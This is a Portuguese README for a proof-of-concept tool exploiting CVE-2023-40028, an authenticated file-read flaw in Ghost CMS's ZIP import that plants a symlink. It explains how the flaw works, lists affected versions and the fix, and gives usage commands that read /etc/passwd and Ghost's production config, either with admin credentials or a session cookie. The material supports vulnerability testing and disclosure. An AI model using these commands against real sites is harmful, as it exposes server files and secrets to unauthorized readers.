
POC para CVE-2023-40028: Leitura Arbitrária de Arquivos no Ghost CMS
Prova de conceito para CVE-2023-40028, uma vulnerabilidade autenticada de leitura arbitrária de arquivos no recurso de importação de conteúdo do Ghost. Um arquivo ZIP especialmente criado cria um symlink em content/images, permitindo que o script solicite um arquivo do host Ghost.
Versões do Ghost anteriores à 5.59.1 são afetadas. Atualize para a 5.59.1 ou posterior.
Use isto apenas contra sistemas que você possui ou está autorizado a testar.
requestsghost-admin-api-session válidopython3 -m venv .venv
source .venv/bin/activate
python -m pip install requests
Ler um arquivo com nome de usuário e senha:
python3 ghost_fileread.py \
--url https://ghost.example \
--username [email protected] \
--password 'password' \
--file /etc/passwd
Usar um cookie de sessão de administrador existente:
python3 ghost_fileread.py \
--url https://ghost.example \
--cookie 'session-cookie-value' \
--file /var/lib/ghost/config.production.json
Omita --file para abrir o prompt interativo file>. Execute python3 ghost_fileread.py --help para opções de proxy, timeout e User-Agent.
O endpoint retorna texto, portanto esta ferramenta destina-se a arquivos de texto. A importação do arquivo especialmente criado deixa um symlink no diretório content/images do alvo.